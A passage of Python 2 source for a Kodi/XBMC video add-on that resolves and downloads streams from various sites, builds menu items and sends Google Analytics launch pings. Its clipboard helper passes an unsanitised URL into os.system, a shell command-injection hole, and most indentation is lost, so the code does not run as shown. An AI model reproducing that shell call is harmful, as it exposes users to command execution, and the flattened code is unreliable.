match=re.compile('<a class="myButton" href="(.+?)">Click Here to Play Part1</a><a class="myButton" href="(.+?)">Click Here to Play Part2</a>').findall(link)
return match[0]
else:
return match[0]
def resolveDownloadLinks(url):
if re.search('watchseries.lt',url):
match=re.compile('(.+?)xocx(.+?)xocx').findall(url)
for hurl, durl in match:
url=geturl('http://watchseries.lt'+hurl)
elif re.search('iwatchonline',url):
        url=GetUrliW(url)
elif re.search('movie25',url):
from resources.libs import movie25
url = movie25.resolveM25URL(url)
elif '</t><sec>' in url:
from resources.libs.movies_tv import icefilms
url = icefilms.resolveIceLink(url)
elif 'mobapps.cc' in url or 'vk.com' in url:
from resources.libs.plugins import mbox
url = mbox.resolveMBLink(url)
elif 'noobroom' in url:
from resources.libs.movies_tv import starplay
url = starplay.find_noobroom_video_url(url)
return url
def Download_Source(name,url):
originalName=name
url = resolveDownloadLinks(url)
name=removeColoredText(name)
name=name.replace('/','').replace('\\','').replace(':','').replace('|','')
name=re.sub(r'[^\w]', ' ', name)
name=name.split(' [')[0]
name=name.split('[')[0]
name=name.split(' /')[0]
name=name.split('/')[0]
stream_url = resolve_url(url)
if stream_url:
print stream_url
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Resolving Link,2000)")
if os.path.exists(downloadPath):
if re.search("flv",stream_url):name += '.flv'
elif re.search("mkv",stream_url): name += '.mkv'
elif re.search("mp4",stream_url): name += '.mp4'
elif re.search("avi",stream_url): name += '.avi'
elif re.search("divx",stream_url): name += '.divx'
else: name += '.mp4'
mypath=os.path.join(downloadPath,name)
if os.path.isfile(mypath):
xbmc.executebuiltin("XBMC.Notification(Download Alert!,The video you are trying to download already exists!,8000)")
else:
name=name.replace(' ','')
DownloadInBack=selfAddon.getSetting('download-in-background')
if DownloadInBack == 'true':
QuietDownload(stream_url,mypath,originalName,name)
else:
Download(stream_url,mypath,originalName,name)
else:
xbmc.executebuiltin("XBMC.Notification(Download Alert!,You have not set the download folder,8000)")
return False
else:
xbmc.executebuiltin("XBMC.Notification(Sorry!,Link Not Found,6000)")
stream_url = False
def Download(url, dest,originalName, displayname=False):
if displayname == False:
displayname=url
delete_incomplete = selfAddon.getSetting('delete-incomplete-downloads')
dp = xbmcgui.DialogProgress()
dp.create('Downloading: '+displayname)
start_time = time.time()
try:
urllib.urlretrieve(url, dest, lambda nb, bs, fs: _pbhook(nb, bs, fs, dp, start_time))
open(DownloadFile,'a').write('{name="%s",destination="%s"}'%(originalName,dest))
except:
if delete_incomplete == 'true':
#delete partially downloaded file if setting says to.
while os.path.exists(dest):
try:
os.remove(dest)
break
except: pass
#only handle StopDownloading (from cancel), ContentTooShort (from urlretrieve), and OS (from the race condition); let other exceptions bubble
if sys.exc_info()[0] in (urllib.ContentTooShortError, StopDownloading, OSError):
return False
else: raise
return False
return True
def QuietDownload(url, dest,originalName, videoname):
import download
download.download(url, dest,title=originalName)
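# _pbhook is the reporthook passed to urllib.urlretrieve(url, dest, reporthook): urlretrieve
# calls it as reporthook(block_count, block_size, total_size) after each block, and Download()
# wires it up via a lambda so the progress dialog and start time can be threaded through, e.g.
#   urllib.urlretrieve(url, dest, lambda nb, bs, fs: _pbhook(nb, bs, fs, dp, start_time))
# Raising StopDownloading from the hook is how a user cancel aborts the transfer.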
def _pbhook(numblocks, blocksize, filesize, dp, start_time):
try:
percent = min(numblocks * blocksize * 100 / filesize, 100)
currently_downloaded = float(numblocks) * blocksize / (1024 * 1024)
kbps_speed = numblocks * blocksize / (time.time() - start_time)
if kbps_speed > 0: eta = (filesize - numblocks * blocksize) / kbps_speed
else: eta = 0
kbps_speed = kbps_speed / 1024
total = float(filesize) / (1024 * 1024)
mbs = '%.02f MB of %.02f MB' % (currently_downloaded, total)
e = 'Speed: %.02f Kb/s ' % kbps_speed
e += 'ETA: %02d:%02d' % divmod(eta, 60)
dp.update(percent, mbs, e)
except:
percent = 100
dp.update(percent)
if dp.iscanceled():
dp.close()
raise StopDownloading('Stopped Downloading')
def jDownloader(murl):
url = resolveDownloadLinks(murl)
if selfAddon.getSetting("jdcb") == "true":
print "Downloading "+murl+" via jDownlaoder"
cmd = 'plugin://plugin.program.jdownloader/?action=addlink&url='+murl
xbmc.executebuiltin('XBMC.RunPlugin(%s)' % cmd)
else:
if 'Win' in PLATFORM:
command = 'echo ' + url.strip() + '| clip'
os.system(command)
else:
command = 'echo ' + url.strip() + '| pbcopy'
os.system(command)
################################################################################ Message ##########################################################################################################
def Message():
help = SHOWMessage()
help.doModal()
main.GA("None","Mash2k3Info")
del help
class SHOWMessage(xbmcgui.Window):
def __init__(self):
self.addControl(xbmcgui.ControlImage(0,0,1280,720,art+'/infoposter.png'))
def onAction(self, action):
if action == 92 or action == 10:
xbmc.Player().stop()
self.close()
def TextBoxes(heading,anounce):
class TextBox():
"""Thanks to BSTRDMKR for this code:)"""
# constants
WINDOW = 10147
CONTROL_LABEL = 1
CONTROL_TEXTBOX = 5
def __init__( self, *args, **kwargs):
# activate the text viewer window
xbmc.executebuiltin( "ActivateWindow(%d)" % ( self.WINDOW, ) )
# get window
self.win = xbmcgui.Window( self.WINDOW )
# give window time to initialize
xbmc.sleep( 500 )
self.setControls()
def setControls( self ):
# set heading
self.win.getControl( self.CONTROL_LABEL ).setLabel(heading)
try:
f = open(anounce)
text = f.read()
except:
text=anounce
self.win.getControl( self.CONTROL_TEXTBOX ).setText(text)
return
TextBox()
################################################################################ Google Analytics ##########################################################################################################
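# The helpers below post hits straight to the legacy Google Analytics __utm.gif endpoint:
# each request encodes the page path (utmp), optional event data (utme), the account id
# (utmac) and a synthetic visitor cookie (utmcc) as query parameters. checkGA() throttles the
# app-launch ping to at most once every two hours via the 'ga_time' setting.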
def parseDate(dateString,datetime):
try:
return datetime.datetime.fromtimestamp(time.mktime(time.strptime(dateString.encode('utf-8', 'replace'), "%Y-%m-%d %H:%M:%S")))
except:
return datetime.datetime.today() - datetime.timedelta(days = 1) #force update
def checkGA():
if selfAddon.getSetting("gastatus") == "true":
import datetime
secsInHour = 60 * 60
threshold = 2 * secsInHour
now = datetime.datetime.today()
prev = parseDate(selfAddon.getSetting('ga_time'),datetime)
delta = now - prev
nDays = delta.days
nSecs = delta.seconds
doUpdate = (nDays > 0) or (nSecs > threshold)
if not doUpdate:
return
selfAddon.setSetting('ga_time', str(now).split('.')[0])
threading.Thread(target=APP_LAUNCH).start()
else:
print "MashUp Google Analytics disabled"
def send_request_to_google_analytics(utm_url):
ua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'
import urllib2
try:
req = urllib2.Request(utm_url, None,
{'User-Agent':ua}
)
response = urllib2.urlopen(req).read()
    except:
        print ("GA fail: %s" % utm_url)
        return None
    return response
def GA(group,name):
if selfAddon.getSetting("gastatus") == "true":
threading.Thread(target=GAthread, args=(group,name)).start()
def GAthread(group,name):
try:
try:
from hashlib import md5
except:
from md5 import md5
from random import randint
import time
from urllib import unquote, quote
from os import environ
from hashlib import sha1
VISITOR = selfAddon.getSetting('visitor_ga')
utm_gif_location = "http://www.google-analytics.com/__utm.gif"
if not group=="None":
utm_track = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmt=" + "event" + \
"&utme="+ quote("5("+PATH+"*"+group+"*"+name+")")+\
"&utmp=" + quote(PATH) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR,VISITOR,"2"])
try:
print "============================ POSTING TRACK EVENT ============================"
send_request_to_google_analytics(utm_track)
except:
print "============================ CANNOT POST TRACK EVENT ============================"
if name=="None":
utm_url = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmp=" + quote(PATH) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR, VISITOR,"2"])
else:
if group=="None":
utm_url = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmp=" + quote(PATH+"/"+name) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR, VISITOR,"2"])
else:
utm_url = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmp=" + quote(PATH+"/"+group+"/"+name) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR, VISITOR,"2"])
print "============================ POSTING ANALYTICS ============================"
send_request_to_google_analytics(utm_url)
except:
print "================ CANNOT POST TO ANALYTICS ================"
def APP_LAUNCH():
versionNumber = int(xbmc.getInfoLabel("System.BuildVersion" )[0:2])
if versionNumber < 12:
if xbmc.getCondVisibility('system.platform.osx'):
if xbmc.getCondVisibility('system.platform.atv2'):
log_path = '/var/mobile/Library/Preferences'
else:
log_path = os.path.join(os.path.expanduser('~'), 'Library/Logs')
elif xbmc.getCondVisibility('system.platform.ios'):
log_path = '/var/mobile/Library/Preferences'
elif xbmc.getCondVisibility('system.platform.windows'):
log_path = xbmc.translatePath('special://home')
elif xbmc.getCondVisibility('system.platform.linux'):
log_path = xbmc.translatePath('special://home/temp')
else:
log_path = xbmc.translatePath('special://logpath')
else:
print '======================= more than ===================='
log_path = xbmc.translatePath('special://logpath')
log = os.path.join(log_path, 'xbmc.log')
try:
logfile = open(log, 'r').read()
except:
logfile='Starting XBMC ('+str(versionNumber)+'.0 Git:.+?Platform: Unknown. Built.+?'
match=re.compile('Starting XBMC \((.+?) Git:.+?Platform: (.+?)\. Built.+?').findall(logfile)
print '========================== '+PATH+' '+VERSION+' =========================='
    RepoVer='Repo Not Installed'
    try:
        repo = os.path.join(repopath, 'addon.xml')
        repofile = open(repo, 'r').read()
        repov=re.compile('version="([^"]+?)" provider-name').findall(repofile)
        if repov:
            RepoVer = repov[0]
    except:
        pass
try:
from hashlib import md5
except:
from md5 import md5
from random import randint
import time
from urllib import unquote, quote
from os import environ
from hashlib import sha1
import platform
VISITOR = selfAddon.getSetting('visitor_ga')
for build, PLATFORM in match:
if re.search('12.0',build,re.IGNORECASE):
build="Frodo"
if re.search('11.0',build,re.IGNORECASE):
build="Eden"
if re.search('13.0',build,re.IGNORECASE):
build="Gotham"
print build
print PLATFORM
print "Repo Ver. "+RepoVer
utm_gif_location = "http://www.google-analytics.com/__utm.gif"
utm_track = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmt=" + "event" + \
"&utme="+ quote("5(APP LAUNCH*"+"Mash Up v"+VERSION+"/ Repo v"+RepoVer+"*"+build+"*"+PLATFORM+")")+\
"&utmp=" + quote(PATH) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR,VISITOR,"2"])
try:
print "============================ POSTING APP LAUNCH TRACK EVENT ============================"
send_request_to_google_analytics(utm_track)
except:
print "============================ CANNOT POST APP LAUNCH TRACK EVENT ============================"
utm_track = utm_gif_location + "?" + \
"utmwv=" + VERSION + \
"&utmn=" + str(randint(0, 0x7fffffff)) + \
"&utmt=" + "event" + \
"&utme="+ quote("5(APP LAUNCH*"+"Mash Up v"+VERSION+"/ Repo v"+RepoVer+"*"+PLATFORM+")")+\
"&utmp=" + quote(PATH) + \
"&utmac=" + UATRACK + \
"&utmcc=__utma=%s" % ".".join(["1", VISITOR, VISITOR, VISITOR,VISITOR,"2"])
try:
print "============================ POSTING APP LAUNCH TRACK EVENT ============================"
send_request_to_google_analytics(utm_track)
except:
print "============================ CANNOT POST APP LAUNCH TRACK EVENT ============================"
checkGA()
################################################################################ Types of Directories ##########################################################################################################
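# addDirX is the central list-item builder: it URL-encodes every parameter into a plugin://
# callback URL (sys.argv[0] plus a query string), optionally resolves movie/episode metadata,
# and attaches the context-menu commands (favourites, downloads, watched toggles, trailer and
# metadata refresh) before handing the item to xbmcplugin.addDirectoryItem.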
def addDirX(name,url,mode,iconimage,plot='',fanart='',dur=0,genre='',year='',imdb='',tmdb='',isFolder=True,searchMeta=False,addToFavs=True,
id=None,fav_t='',fav_addon_t='',fav_sub_t='',metaType='Movies',menuItemPos=None,menuItems=None,down=False,replaceItems=True,index=False):
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&iconimage="+urllib.quote_plus(iconimage)+"&plot="+urllib.quote_plus(plot)+"&fanart="+urllib.quote_plus(fanart)+"&genre="+urllib.quote_plus(genre)+"&index="+str(index)
if searchMeta:
if metaType == 'TV':
infoLabels = GETMETAEpiT(name,iconimage,plot)
else:
infoLabels = GETMETAT(name,genre,fanart,iconimage,plot,imdb,tmdb)
iconimage = infoLabels['cover_url']
if iconimage.startswith('w342') or iconimage.startswith('w92') or iconimage.startswith('w500') or iconimage.startswith('original') or iconimage.startswith('w154') or iconimage.startswith('w185'):
iconimage = 'http://image.tmdb.org/t/p/' + iconimage
fanart = infoLabels['backdrop_url']
if fanart.startswith('original') or fanart.startswith('w1280') or fanart.startswith('w780') or fanart.startswith('w300'):
fanart = 'http://image.tmdb.org/t/p/' + fanart
plot = infoLabels['plot']
if not fanart: fanart=fanartimage
if not iconimage: iconimage=art+'/vidicon.png'
if not plot: plot='Sorry description not available'
plot=plot.replace(",",'.')
Commands = []
if selfAddon.getSetting("ctx_fav") != "false" and addToFavs:
fav = getFav()
fname = name.replace(",",'')
if isFolder:
Commands.append(("[B][COLOR blue]Add[/COLOR][/B] to My Fav's",fav.add_directory(fname, u, section_title=fav_t, section_addon_title=fav_addon_t+" Fav's", sub_section_title=fav_sub_t, img=iconimage, fanart=fanart, infolabels={'item_mode':mode, 'item_url':url, 'plot':plot,'duration':dur,'genre':genre,'year':year})))
else:
Commands.append(("[B][COLOR blue]Add[/COLOR][/B] to My Fav's",fav.add_video_item(fname, u, section_title=fav_t, section_addon_title=fav_addon_t+" Fav's", sub_section_title=fav_sub_t, img=iconimage, fanart=fanart, infolabels={'item_mode':mode, 'item_url':url, 'plot':plot,'duration':dur,'genre':genre,'year':year})))
Commands.append(("[B][COLOR red]Remove[/COLOR][/B] from My Fav's",fav.delete_item(fname, section_title=fav_t, section_addon_title=fav_addon_t+" Fav's", sub_section_title=fav_sub_t)))
if down:
sysurl = urllib.quote_plus(url)
sysname= urllib.quote_plus(name)
Commands.append(('Direct Download', 'XBMC.RunPlugin(%s?mode=190&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
if selfAddon.getSetting("jdcb") == "true":
Commands.append(('Download with jDownloader', 'XBMC.RunPlugin(%s?mode=776&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
else:
Commands.append(('Copy to Clipboard', 'XBMC.RunPlugin(%s?mode=776&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
if searchMeta:
Commands.append(('[B]Super Search [COLOR=FF67cc33]Me[/COLOR][/B]','XBMC.Container.Update(%s?mode=21&name=%s&url=%s)'% (sys.argv[0], urllib.quote_plus(name),'###')))
if metaType == 'TV' and selfAddon.getSetting("meta-view-tv") == "true":
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
cname = infoLabels['title']
cname = cname.decode('ascii', 'ignore')
cname = urllib.quote_plus(cname)
sea = infoLabels['season']
epi = infoLabels['episode']
imdb_id = infoLabels['imdb_id']
if imdb_id != '':
if infoLabels['overlay'] == 6: watched_mark = 'Mark as Watched'
else: watched_mark = 'Mark as Unwatched'
Commands.append((watched_mark, 'XBMC.RunPlugin(%s?mode=779&name=%s&url=%s&iconimage=%s&season=%s&episode=%s)' % (sys.argv[0], cname, 'episode', imdb_id,sea,epi)))
Commands.append(('Refresh Metadata', 'XBMC.RunPlugin(%s?mode=780&name=%s&url=%s&iconimage=%s&season=%s&episode=%s)' % (sys.argv[0], cname, 'episode',imdb_id,sea,epi)))
elif metaType == 'Movies' and selfAddon.getSetting("meta-view") == "true":
xbmcplugin.setContent(int(sys.argv[1]), 'Movies')
if id != None: xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_PLAYLIST_ORDER )
else: xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_UNSORTED )
xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_TITLE )
xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_YEAR )
xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_RATING )
xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_GENRE )
xbmcplugin.addSortMethod( handle=int( sys.argv[ 1 ] ), sortMethod=xbmcplugin.SORT_METHOD_MPAA_RATING )
cname=urllib.quote_plus(infoLabels['metaName'])
imdb_id = infoLabels['imdb_id']
if infoLabels['overlay'] == 6: watched_mark = 'Mark as Watched'
else: watched_mark = 'Mark as Unwatched'
Commands.append((watched_mark, 'XBMC.RunPlugin(%s?mode=777&name=%s&url=%s&iconimage=%s)' % (sys.argv[0], cname, 'movie',imdb_id)))
Commands.append(('Play Trailer','XBMC.RunPlugin(%s?mode=782&name=%s&url=%s&iconimage=%s)'% (sys.argv[0],cname,'_',imdb_id)))
Commands.append(('Refresh Metadata', 'XBMC.RunPlugin(%s?mode=778&name=%s&url=%s&iconimage=%s)' % (sys.argv[0], cname, 'movie',imdb_id)))
else:
infoLabels={ "Title": name, "Plot": plot, "Duration": dur, "Year": year ,"Genre": genre,"OriginalTitle" : removeColoredText(name) }
if id != None: infoLabels["count"] = id
Commands.append(('Watch History','XBMC.Container.Update(%s?name=None&mode=222&url=None&iconimage=None)'% (sys.argv[0])))
Commands.append(("My Fav's",'XBMC.Container.Update(%s?name=None&mode=639&url=None&iconimage=None)'% (sys.argv[0])))
Commands.append(('[B][COLOR=FF67cc33]MashUp[/COLOR] Settings[/B]','XBMC.RunScript('+xbmc.translatePath(mashpath + '/resources/libs/settings.py')+')'))
if menuItemPos != None:
for mi in reversed(menuItems):
Commands.insert(menuItemPos,mi)
liz=xbmcgui.ListItem(name, iconImage=art+'/vidicon.png', thumbnailImage=iconimage)
liz.addContextMenuItems( Commands, replaceItems=False)
    liz.setInfo( type="Video", infoLabels=infoLabels )
    liz.setProperty('fanart_image', fanart)
return xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=isFolder)
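# The add* helpers below are thin wrappers around addDirX that preset the favourites section,
# metadata type and folder/playable flags for each content category (TV, movies, live, misc.).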
def addDirT(name,url,mode,iconimage,plot,fanart,dur,genre,year,index=False):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,fav_t='TV',fav_addon_t='TV Show',fav_sub_t='Shows',index=index)
def addPlayT(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=False,fav_t='TV',fav_addon_t='TV Show',fav_sub_t='Shows')
def addDirTE(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,searchMeta=1,metaType='TV',fav_t='TV',fav_addon_t='TV Episode',fav_sub_t='Episodes')
def addPlayTE(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,searchMeta=1,metaType='TV',fav_t='TV',fav_addon_t='TV Episode',fav_sub_t='Episodes')
def addDirM(name,url,mode,iconimage,plot,fanart,dur,genre,year,imdb=''):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,imdb,searchMeta=1,fav_t='Movies',fav_addon_t='Movie')
def addPlayM(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,searchMeta=1,fav_t='Movies',fav_addon_t='Movie')
def addDirMs(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,fav_t='Misc.',fav_addon_t='Misc.')
def addPlayMs(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,fav_t='Misc.',fav_addon_t='Misc.')
def addDirL(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,fav_t='Live',fav_addon_t='Live')
def addPlayL(name,url,mode,iconimage,plot,fanart,dur,genre,year,secName='',secIcon=''):
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&iconimage="+urllib.quote_plus(iconimage)+"&plot="+urllib.quote_plus(plot)+"&fanart="+urllib.quote_plus(fanart)+"&genre="+urllib.quote_plus(genre)
surl=urllib.quote_plus(u)
dname=removeColoredText(name)
mi=[('Add to [COLOR=FFa11d21][B]ONTapp.tv[/B][/COLOR]', 'XBMC.RunPlugin(%s?mode=1501&plot=%s&name=%s&url=%s&iconimage=%s)' % (sys.argv[0] ,secName,dname,surl, secIcon))]
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,fav_t='Live',fav_addon_t='Live',menuItemPos=2,menuItems=mi)
def addPlayc(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,addToFavs=0)
def addDirb(name,url,mode,iconimage,fanart):
return addDirX(name,url,mode,iconimage,'',fanart,addToFavs=0)
def addDirc(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,addToFavs=0)
def addDirXml(name,url,mode,iconimage,plot,fanart,dur,genre,year):
contextMenuItems = []
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&iconimage="+urllib.quote_plus(iconimage)+"&plot="+urllib.quote_plus(plot)+"&fanart="+urllib.quote_plus(fanart)
liz=xbmcgui.ListItem(name, iconImage=art+'/xmlplaylist.png', thumbnailImage=iconimage)
liz.setInfo( type="Video", infoLabels={ "Title": name, "Plot": plot } )
if fanart == '':
fanart=fanartimage
liz.setProperty('fanart_image', fanart)
if selfAddon.getSetting("addmethod") == "true":
contextMenuItems.append(('[B][COLOR blue]Add[/COLOR][/B] Playlist','XBMC.RunPlugin(%s?name=None&mode=250&url=%s&iconimage=None)'% (sys.argv[0],urllib.quote_plus(plot))))
contextMenuItems.append(("[B][COLOR red]Remove[/COLOR][/B] Playlist",'XBMC.RunPlugin(%s?name=%s&mode=251&url=%s&iconimage=%s)'% (sys.argv[0],name,urllib.quote_plus(url),plot)))
contextMenuItems.append(("[B][COLOR aqua]Edit[/COLOR][/B] Playlist",'XBMC.RunPlugin(%s?name=%s&mode=255&url=%s&iconimage=%s)'% (sys.argv[0],name,urllib.quote_plus(url),plot)))
if selfAddon.getSetting("addmethod") == "true":
contextMenuItems.append(('[B][COLOR blue]Add[/COLOR][/B] Folder','XBMC.RunPlugin(%s?name=%s&mode=252&url=%s&iconimage=None)'% (sys.argv[0],name,plot)))
contextMenuItems.append(('Watch History','XBMC.Container.Update(%s?name=None&mode=222&url=None&iconimage=None)'% (sys.argv[0])))
contextMenuItems.append(("My Fav's",'XBMC.Container.Update(%s?name=None&mode=639&url=None&iconimage=None)'% (sys.argv[0])))
liz.addContextMenuItems(contextMenuItems, replaceItems=False)
if dur=='Livestreams':
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=False)
else:
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=True)
return ok
def addXmlFolder(name,url,mode,iconimage,plot,fanart,dur,genre,year):
contextMenuItems = []
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&iconimage="+urllib.quote_plus(iconimage)+"&plot="+urllib.quote_plus(plot)+"&fanart="+urllib.quote_plus(fanart)
liz=xbmcgui.ListItem(name, iconImage=art+'/folder.png', thumbnailImage=iconimage)
liz.setInfo( type="Video", infoLabels={ "Title": name, "Plot": plot } )
if fanart == '':
fanart=fanartimage
liz.setProperty('fanart_image', fanart)
if selfAddon.getSetting("addmethod") == "true":
contextMenuItems.append(('[B][COLOR blue]Add[/COLOR][/B] Playlist','XBMC.RunPlugin(%s?name=None&mode=250&url=%s&iconimage=None)'% (sys.argv[0],urllib.quote_plus(plot))))
if plot=='home':
contextMenuItems.append(('[B][COLOR blue]Add[/COLOR][/B] Folder','XBMC.RunPlugin(%s?name=%s&mode=252&url=%s&iconimage=None)'% (sys.argv[0],name,urllib.quote_plus(plot))))
contextMenuItems.append(("[B][COLOR red]Remove[/COLOR][/B] Folder",'XBMC.RunPlugin(%s?name=%s&mode=254&url=%s&iconimage=None)'% (sys.argv[0],name,url)))
contextMenuItems.append(("[B][COLOR aqua]Edit[/COLOR][/B] Folder",'XBMC.RunPlugin(%s?name=%s&mode=256&url=%s&iconimage=None)'% (sys.argv[0],name,url)))
contextMenuItems.append(('Watch History','XBMC.Container.Update(%s?name=None&mode=222&url=None&iconimage=None)'% (sys.argv[0])))
contextMenuItems.append(("My Fav's",'XBMC.Container.Update(%s?name=None&mode=639&url=None&iconimage=None)'% (sys.argv[0])))
liz.addContextMenuItems(contextMenuItems, replaceItems=False)
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=True)
return ok
def addLink(name,url,iconimage):
liz=xbmcgui.ListItem(name, iconImage=art+'/link.png', thumbnailImage=iconimage)
liz.setInfo( type="Video", infoLabels={ "Title": name } )
liz.setProperty('fanart_image', fanartimage)
return xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=liz)
def addDir(name,url,mode,iconimage,plot='',fanart='',index=False):
return addDirX(name,url,mode,iconimage,plot,fanart,addToFavs=0,replaceItems=False,index=index)
def addDirHome(name,url,mode,iconimage,index=False):
return addDirX(name,url,mode,iconimage,addToFavs=0,index=index)
def addDirFIX(name,url,mode,iconimage,location,path):
contextMenuItems = []
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&iconimage="+urllib.quote_plus(iconimage)+"&location="+urllib.quote_plus(location)+"&path="+urllib.quote_plus(path)
liz=xbmcgui.ListItem(name, iconImage=art+'/vidicon.png', thumbnailImage=iconimage)
liz.setInfo( type="Video", infoLabels={ "Title": name } )
liz.setProperty('fanart_image', fanartimage)
contextMenuItems.append(('Watch History','XBMC.Container.Update(%s?name=None&mode=222&url=None&iconimage=None)'% (sys.argv[0])))
contextMenuItems.append(("My Fav's",'XBMC.Container.Update(%s?name=None&mode=639&url=None&iconimage=None)'% (sys.argv[0])))
liz.addContextMenuItems(contextMenuItems, replaceItems=False)
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=False)
return ok
def addDown2(name,url,mode,iconimage,fanart):
    return addDirX(name,url,mode,iconimage,'',fanart,isFolder=0,addToFavs=0,down=1)
def addDown3(name,url,mode,iconimage,fanart,id=None):
return addDirX(name,url,mode,iconimage,'',fanart,isFolder=0,searchMeta=1,fav_t='Movies',fav_addon_t='Movie',id=id,down=1)
def addDown4(name,url,mode,iconimage,plot,fanart,dur,genre,year):
f = '</sublink>' in url
if re.search('(?i)\ss(\d+)e(\d+)',name) or re.search('(?i)Season(.+?)Episode',name):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=f,searchMeta=1,metaType='TV',
fav_t='TV',fav_addon_t='TV Episode',fav_sub_t='Episodes',down=not f)
else:
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=f,searchMeta=1,
fav_t='Movies',fav_addon_t='Movie',down=not f)
def addInfo(name,url,mode,iconimage,genre,year):
mi = [('Search Movie25','XBMC.Container.Update(%s?mode=4&url=%s)'% (sys.argv[0],'###'))]
return addDirX(name,url,mode,iconimage,'','','',genre,year,searchMeta=1,fav_t='Movies',fav_addon_t='Movie',menuItemPos=0,menuItems=mi)
def addDirIWO(name,url,mode,iconimage,plot,fanart,dur,genre,year):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,searchMeta=1,fav_t='Movies',fav_addon_t='Movie')
def addDLog(name,url,mode,iconimage,plot,fanart,dur,genre,year):
mi=[("[B][COLOR red]Remove[/COLOR][/B]",'XBMC.RunPlugin(%s?mode=243&name=%s&url=%s)'% (sys.argv[0],name,url))]
if re.search('(?i)\ss(\d+)e(\d+)',name) or re.search('(?i)Season(.+?)Episode',name):
return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,searchMeta=1,metaType='TV',addToFavs=0,menuItemPos=0,menuItems=mi)
else: return addDirX(name,url,mode,iconimage,plot,fanart,dur,genre,year,isFolder=0,searchMeta=1,addToFavs=0,menuItemPos=0,menuItems=mi)
def addSpecial(name,url,mode,iconimage):
liz=xbmcgui.ListItem(name,iconImage="",thumbnailImage = iconimage)
liz.setProperty('fanart_image', fanartimage)
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=False)
